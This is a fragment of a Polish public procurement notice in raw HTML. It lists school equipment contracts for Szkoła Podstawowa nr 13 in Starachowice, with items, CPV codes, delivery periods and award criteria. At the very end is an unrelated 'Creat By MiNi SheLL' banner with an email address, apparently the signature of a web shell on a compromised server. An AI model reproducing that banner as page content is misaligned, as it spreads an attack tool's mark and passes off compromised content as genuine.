	Zadanie nr 8 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 13 w Starachowicach
	                         ul. Prądzyńskiego 2.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.52.41.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa sprzętu multimedialnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa sprzętu multimedialnego oraz pomocy dydaktycznych:
-Komputer przenośny typu laptop wraz z oprogramowaniem - 5 sztuk
-Tablica interaktywna - 1 sztuka
-Projektor multimedialny - 2 sztuki
-Ekran projekcyjny - 1 sztuka
-Radioodtwarzacz - 1 sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 39.16.21.10-9, 30.21.31.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa sprzętu informatycznego i biurowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa sprzętu informatycznego i biurowego:
-Aparat cyfrowy - 1 sztuka
-Projektor - 1 sztuka
-Notebook - 1 sztuka
-Oprogramowanie do tworzenia prezentacji multimedialnych - 1 sztuka
-Telefon bezprzewodowy - 1 sztuka
-Niszczarka - 1 sztuka
-Flipchart magnetyczny suchościeralny - 1 sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.19.14.00-8, 38.65.21.00-1, 38.65.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com